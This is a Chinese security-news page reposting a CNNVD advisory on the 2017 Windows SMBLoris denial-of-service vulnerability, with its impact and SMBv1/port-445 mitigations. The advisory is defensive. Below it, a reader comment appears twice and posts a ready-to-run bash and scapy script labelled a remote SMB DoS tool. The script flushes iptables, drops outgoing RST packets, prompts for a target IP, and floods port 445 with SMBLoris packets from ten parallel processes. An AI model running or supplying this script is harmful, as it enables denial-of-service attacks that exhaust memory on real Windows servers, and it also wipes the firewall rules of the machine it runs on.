CNNVD关于Windows SMBLoris漏洞情况的通报

2017-08-08 300038人围观 ,发现 2 个不明物体 漏洞资讯

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

近日,在2017DEFCON安全大会上,某安全研究员披露了有关“Windows SMBLoris漏洞”的相关情况。远程攻击者利用该漏洞可对目标Windows服务器实施DOS攻击,导致服务器内存资源耗尽从而拒绝服务。截止目前,微软官方未对该漏洞发布升级补丁,仅建议用户“禁用SMBv1协议”。国家信息安全漏洞库(CNNVD)进行了跟踪分析,漏洞情况如下:

一、  漏洞简介

Microsoft Windows是美国微软(Microsoft)公司发布的一系列操作系统。SMB(Server Message Block)是其中的一个服务器协议组件。微软公司于Windows2000引入该协议,并在之后版本对该协议有重大的更改与完善。

Windows 2000之后的版本中存在SMBLoris漏洞(CNNVD-201708-064)。该漏洞是由于攻击者通过向开放445、139端口的目标Windows系统发送特殊构造的SMB报文请求内存分配,从而达到大量消耗服务器内存的目的,最终致使服务器拒绝服务。

二、  漏洞危害

该漏洞危害严重。攻击者通过不断消耗服务器内存,致使恶0意占用系统中所有物理内存,并导致CPU峰值达到100%,系统崩溃。并且由于系统内存耗尽,操作系统无法记录日志。

该漏洞危害范围大。该漏洞影响Window 2000以后的所有版本。

三、修复措施

截止目前,微软官方未对该漏洞发布升级补丁。请受影响用户及时检查,如受漏洞影响,可采用以下缓解措施:

禁用SMBV1协议,阻止从Internet到SMBv1的访问。根据漏洞机理,用户可限制从单个ip地址到SMB端口的连接来缓解攻击。用户也可关闭共享服务或开启445和139端口白名单访问来缓解攻击。

相关操作可参考:https://support.microsoft.com/zh-cn/help/2696547/how-to-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and-windows 

本通报由CNNVD技术支撑单位——杭州安恒信息技术有限公司、北京三零卫士信息安全技术有限公司提供支持。 

CNNVD将继续跟踪上述漏洞的相关情况,及时发布相关信息。如有需要,可与CNNVD联系。

联系方式: cnnvd@itsec.gov.cn

*本文作者:CNNVD,转载请注明来自 FreeBuf.COM 

相关推荐

这些评论亮了

  • hey你的拔粪宝 (4级) 这家伙不懒,但也未填写个人描述! 回复
    #!/bin/bash
    clear
    echo ". ... . . . . . . ri . . . . ... .::iii ., . . .
    . . . . . . . . ,Si. . :jkSuY::: ... ... .:.
    . . . . . . . . . 7q:: ......... .rq@XXrvi . . . ..;:
    . . . . . XJii. ..,,:,::::::,..iJr.., . . . .r:
    . . . :j ..,,:,,.,,:,:::::,... .,. . . . 7i
    . vr ,iiiii:i:::::i::::,,...: .. . . .vr
    . . . . . 5 ;vrr;;i;ii:iiri;;;i:::.:i. . . . .Yr
    . . . . :2 :u7rri:i::,,:rr7riii::::.. . . . .L7
    . . . . . . . Lr :r77r7FPq1Li:i::rii::,::: . . . .Jr
    . .. . . . . N. iFZZriYMMOMEvi:::::i::..:. . . . . .r:
    . . . . . i5 FB@S. .iLv7:,,:::::;i:Li.. . . . ,:,
    . . . . . Jr :ji:::ir,. .,::;iii7r15Br. . . . .qY:
    . . . G. .YO0P;r7:::::r7vri:MB2UY . . . .::
    . :::...7Y ri:i.::7X2vvLv7iir::irL7ri . . . .
    . ,r7. .,:.. rF. .OFJ2q0Nq8P51P1Lr;i7Jrrv7i: . . ... .
    . .:j7,. .Li :7. jMMB0NYi:vuuujvL7;rMBMu..: .. ......
    . .uN1j7U2:J7,,v:. rqSU@P5Yri:,r77LuLYrrv2L:,Li ... ... .
    . .i5MB@BNBGrYJriY@@OL .F1FkSY7rLuXXSJvi:.;2U:, ... . ..
    ;:uSPLSB@BMBMrrE@B0. . :OBOMOOE8MMSui,.:rJ1J,,r. . . ...
    . i25qJ1FJE@@@BMr : 2@B@MZOOS7,,i7jM@LrS0EiiY: . ..
    . j@51YuLJq077;: ,ii7X2LrrrirLFPNB@BY.Lu1kjrU@Bu: ...
    ;,,. .BBNNXU7ii7JUL 5BZ5MBOB@B@B@NYvYjirSFGZ5viii77YM ..
    @0qu7.rB@MMPuk: . ,OkY5UZZGqL5Ov7B@Ov2@8JuuuuYvri:iU8 .
    EXXX2J,ZMO8O0PuY7 :L2kquk5vq0:YFiJ@M2qBXkOMPuvJu211ur0u ..
    , ii77:k@OG8OFXJ55:O@F85Uu1B@2YM@MPMZ5@0M0L::iuPGNXS2r7B:::,
    O0: .. iBBENXGq1EMFBB@kr2iv1v7u@BNUB58OOv:iL5ZEXFk5Fu7iZ7Yjv
    GNv,,,. 7BMOMGqEMO@UrFrv@X18MBEqZ77XPMM7i7uJ7ii:::i7JL7LNNGq
    jYFX251v,uBBOOMMGBk,.,i@BY2@@@BZ08Z5q@5iii::,,.,.i::7j7r:7vL
    uY5U2u5FPL2O@BMGGMuiUGL2kjvkBB@B@B@N@@uvUkkPEXu7:iL7rJL,::::
    vvJuYL777uv2G@BMB@O5M@POB@BNEFv7vjJJ5FvL7iir7Yuk1riY722.....
    qUSF51FUu12; rJ2uXOMOuSMGZr, ...,,::,,:i7rii,i7Ni
    "
    echo " Windows SMB 远程Dos工具 - 需要开启445端口"
    echo "----------------------------------------------------------------"
    echo "[*] 正在检查 python-scapy 模块是否安装... "
    python -c "import scapy"
    if [ $? -ne 0 ]; then
    echo "[-] 未找到Scapy,请使用apt-get install python-scapy来安装!"
    exit 0
    fi
    echo "[*] 已找到 Scapy "
    echo "[*] 稍等... "
    iptables -F
    iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP
    echo -e "输入目标IP地址: \c"
    read ip
    echo -e "输入线程数(试试90000?): \c"
    read threads
    echo 'from scapy.all import *' > smb-dos.py
    echo 'import sys' >> smb-dos.py
    echo '' >> smb-dos.py
    echo 'p0 = int(sys.argv[1])' >> smb-dos.py
    echo '' >> smb-dos.py
    echo 'conf.L3socket' >> smb-dos.py
    echo 'conf.L3socket=L3RawSocket' >> smb-dos.py
    echo '' >> smb-dos.py
    echo 'i = IP()' >> smb-dos.py
    echo -n 'i.dst = "' >> smb-dos.py
    echo -n $ip >> smb-dos.py
    echo '"' >> smb-dos.py
    echo 't = TCP()' >> smb-dos.py
    echo 't.dport = 445' >> smb-dos.py
    echo '' >> smb-dos.py
    echo -n 'for p in range(p0,p0+' >> smb-dos.py
    echo -n $threads >> smb-dos.py
    echo '):' >> smb-dos.py
    echo ' print p' >> smb-dos.py
    echo ' t.sport = p' >> smb-dos.py
    echo ' t.flags = "S"' >> smb-dos.py
    echo '' >> smb-dos.py
    echo ' r = sr1(i/t)' >> smb-dos.py
    echo ' rt = r[TCP]' >> smb-dos.py
    echo ' t.ack = rt.seq + 1' >> smb-dos.py
    echo ' t.seq = rt.ack' >> smb-dos.py
    echo ' t.flags= "A"' >> smb-dos.py
    echo " 亲爱的ss = '\x00\x01\xff\xff'" >> smb-dos.py
    echo ' send(i/t/亲爱的ss)' >> smb-dos.py
    ls -la smb-dos.py
    echo '[*] 稍等片刻, 即将开始...'
    sleep 2
    python smb-dos.py 0 &
    python smb-dos.py 1000 &
    python smb-dos.py 2000 &
    python smb-dos.py 3000 &
    python smb-dos.py 4000 &
    python smb-dos.py 5000 &
    python smb-dos.py 6000 &
    python smb-dos.py 7000 &
    python smb-dos.py 8000 &
    python smb-dos.py 9000 &
    不要在windows下保存为.sh文件,因为换行原因会导致放到linux下运行不起来
    )8( 亮了
发表评论

已有 2 条评论

  • hey你的拔粪宝  (4级) 这家伙不懒,但也未填写个人描述!  2017-08-08 回复 1楼

    #!/bin/bash
    clear
    echo ". … . . . . . . ri . . . . … .::iii ., . . .
    . . . . . . . . ,Si. . :jkSuY::: … … .:.
    . . . . . . . . . 7q:: ……… .rq@XXrvi . . . ..;:
    . . . . . XJii. ..,,:,::::::,..iJr.., . . . .r:
    . . . :j ..,,:,,.,,:,:::::,… .,. . . . 7i
    . vr ,iiiii:i:::::i::::,,…: .. . . .vr
    . . . . . 5 ;vrr;;i;ii:iiri;;;i:::.:i. . . . .Yr
    . . . . :2 :u7rri:i::,,:rr7riii::::.. . . . .L7
    . . . . . . . Lr :r77r7FPq1Li:i::rii::,::: . . . .Jr
    . .. . . . . N. iFZZriYMMOMEvi:::::i::..:. . . . . .r:
    . . . . . i5 FB@S. .iLv7:,,:::::;i:Li.. . . . ,:,
    . . . . . Jr :ji:::ir,. .,::;iii7r15Br. . . . .qY:
    . . . G. .YO0P;r7:::::r7vri:MB2UY . . . .::
    . :::…7Y ri:i.::7X2vvLv7iir::irL7ri . . . .
    . ,r7. .,:.. rF. .OFJ2q0Nq8P51P1Lr;i7Jrrv7i: . . … .
    . .:j7,. .Li :7. jMMB0NYi:vuuujvL7;rMBMu..: .. ……
    . .uN1j7U2:J7,,v:. rqSU@P5Yri:,r77LuLYrrv2L:,Li … … .
    . .i5MB@BNBGrYJriY@@OL .F1FkSY7rLuXXSJvi:.;2U:, … . ..
    ;:uSPLSB@BMBMrrE@B0. . :OBOMOOE8MMSui,.:rJ1J,,r. . . …
    . i25qJ1FJE@@@BMr : 2@B@MZOOS7,,i7jM@LrS0EiiY: . ..
    . j@51YuLJq077;: ,ii7X2LrrrirLFPNB@BY.Lu1kjrU@Bu: …
    ;,,. .BBNNXU7ii7JUL 5BZ5MBOB@B@B@NYvYjirSFGZ5viii77YM ..
    @0qu7.rB@MMPuk: . ,OkY5UZZGqL5Ov7B@Ov2@8JuuuuYvri:iU8 .
    EXXX2J,ZMO8O0PuY7 :L2kquk5vq0:YFiJ@M2qBXkOMPuvJu211ur0u ..
    , ii77:k@OG8OFXJ55:O@F85Uu1B@2YM@MPMZ5@0M0L::iuPGNXS2r7B:::,
    O0: .. iBBENXGq1EMFBB@kr2iv1v7u@BNUB58OOv:iL5ZEXFk5Fu7iZ7Yjv
    GNv,,,. 7BMOMGqEMO@UrFrv@X18MBEqZ77XPMM7i7uJ7ii:::i7JL7LNNGq
    jYFX251v,uBBOOMMGBk,.,i@BY2@@@BZ08Z5q@5iii::,,.,.i::7j7r:7vL
    uY5U2u5FPL2O@BMGGMuiUGL2kjvkBB@B@B@N@@uvUkkPEXu7:iL7rJL,::::
    vvJuYL777uv2G@BMB@O5M@POB@BNEFv7vjJJ5FvL7iir7Yuk1riY722…..
    qUSF51FUu12; rJ2uXOMOuSMGZr, …,,::,,:i7rii,i7Ni
    "
    echo " Windows SMB 远程Dos工具 – 需要开启445端口"
    echo "—————————————————————-"
    echo "[*] 正在检查 python-scapy 模块是否安装… "
    python -c "import scapy"
    if [ $? -ne 0 ]; then
    echo "[-] 未找到Scapy,请使用apt-get install python-scapy来安装!"
    exit 0
    fi
    echo "[*] 已找到 Scapy "
    echo "[*] 稍等… "
    iptables -F
    iptables -A OUTPUT -p tcp –tcp-flags RST RST -j DROP
    echo -e "输入目标IP地址: \c"
    read ip
    echo -e "输入线程数(试试90000?): \c"
    read threads
    echo ‘from scapy.all import *’ > smb-dos.py
    echo ‘import sys’ >> smb-dos.py
    echo ” >> smb-dos.py
    echo ‘p0 = int(sys.argv[1])’ >> smb-dos.py
    echo ” >> smb-dos.py
    echo ‘conf.L3socket’ >> smb-dos.py
    echo ‘conf.L3socket=L3RawSocket’ >> smb-dos.py
    echo ” >> smb-dos.py
    echo ‘i = IP()’ >> smb-dos.py
    echo -n ‘i.dst = "’ >> smb-dos.py
    echo -n $ip >> smb-dos.py
    echo ‘"’ >> smb-dos.py
    echo ‘t = TCP()’ >> smb-dos.py
    echo ‘t.dport = 445′ >> smb-dos.py
    echo ” >> smb-dos.py
    echo -n ‘for p in range(p0,p0+’ >> smb-dos.py
    echo -n $threads >> smb-dos.py
    echo ‘):’ >> smb-dos.py
    echo ‘ print p’ >> smb-dos.py
    echo ‘ t.sport = p’ >> smb-dos.py
    echo ‘ t.flags = "S"’ >> smb-dos.py
    echo ” >> smb-dos.py
    echo ‘ r = sr1(i/t)’ >> smb-dos.py
    echo ‘ rt = r[TCP]‘ >> smb-dos.py
    echo ‘ t.ack = rt.seq + 1′ >> smb-dos.py
    echo ‘ t.seq = rt.ack’ >> smb-dos.py
    echo ‘ t.flags= "A"’ >> smb-dos.py
    echo " 亲爱的ss = ‘\x00\x01\xff\xff’" >> smb-dos.py
    echo ‘ send(i/t/亲爱的ss)’ >> smb-dos.py
    ls -la smb-dos.py
    echo ‘[*] 稍等片刻, 即将开始…’
    sleep 2
    python smb-dos.py 0 &
    python smb-dos.py 1000 &
    python smb-dos.py 2000 &
    python smb-dos.py 3000 &
    python smb-dos.py 4000 &
    python smb-dos.py 5000 &
    python smb-dos.py 6000 &
    python smb-dos.py 7000 &
    python smb-dos.py 8000 &
    python smb-dos.py 9000 &

    不要在windows下保存为.sh文件,因为换行原因会导致放到linux下运行不起来

取消
Loading...
CNNVD

中国国家信息安全漏洞库官方账号

60 文章数 2 评论数 2 关注者

特别推荐

推荐关注

官方公众号

聚焦企业安全

填写个人信息

姓名
电话
邮箱
公司
行业
职位
css.php